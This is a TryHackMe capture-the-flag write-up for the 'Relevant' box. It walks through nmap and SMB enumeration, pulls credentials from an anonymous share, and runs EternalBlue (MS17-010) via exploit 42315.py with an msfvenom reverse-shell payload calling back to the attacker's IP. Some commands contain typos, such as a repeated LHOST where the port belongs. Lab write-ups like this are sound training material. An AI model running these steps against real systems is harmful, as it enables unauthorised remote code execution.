Relevant
A medium box from TryHackMe, grabbing creds from an anonymous smb share, then using them with EternalBlue for SYSTEM.
Recon
Running nmap on the box
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 19:57 EDT
Nmap scan report for 10.10.94.110
Host is up (0.10s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2022-07-28T23:57:51+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2022-07-27T23:55:13
|_Not valid after: 2023-01-26T23:55:13
|_ssl-date: 2022-07-28T23:58:31+00:00; +1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-07-28T23:57:52
|_ start_date: 2022-07-28T23:55:14
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-28T16:57:55-07:00
|_clock-skew: mean: 1h24m02s, deviation: 3h07m51s, median: 0s
The HTTP server is just a default IIS instance that is not exploitable, lets enumerate SMB
sudo nmap -p 139.445 --script smb-enum* 10.10.94.110
Host script results:
| smb-enum-sessions:
|_ <nobody>
| smb-enum-shares:
| account_used: guest
| \\10.10.94.110\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.94.110\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.94.110\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.94.110\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Get into the non-default share with smbclient and anonymous access
smblient \\\\10.10.94.110\\nt4wrksv
And download a password.txt file found on it
smb: \> ls
. D 0 Thu Jul 28 20:51:47 2022
.. D 0 Thu Jul 28 20:51:47 2022
passwords.txt A 98 Sat Jul 25 11:15:33 2020
Inside, find some base64 creds
![](/Pasted image 20220728205825.png#center)
Bob:!P@$$W0rD!123
Bill:Juw4nnaM4n420696969!$$$
More smb enumeration, check if the smb version is vulnerable
sudo nmap -p 139,445 --script smb-vuln* 10.10.94.110
And find that the target is vulnerable to EternalBlue (MS17-010)
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Exploitation
Using the searchsploit result for EternalBlue
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Exe | windows/remote/42315.py
Then change the user and the password inside the python file to bob’s credentials
![](/Pasted image 20220728232444.png#center)
Then configure the payload inside of the smb_pwm function to spawn a reverse shell
![](/Pasted image 20220728232540.png#center)
Then create a reverse shell with msfvenom called rshell.exe
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.6.107.137 LHOST=9999 > rshell.exe
Set up a listener on the chosen port
Then run it with
python2 42315.py 10.10.94.110
And get a system shell!
This exploit took me about 3 hours to use because python3 doesn’t like converting bytes to strings, but its okay I just used python2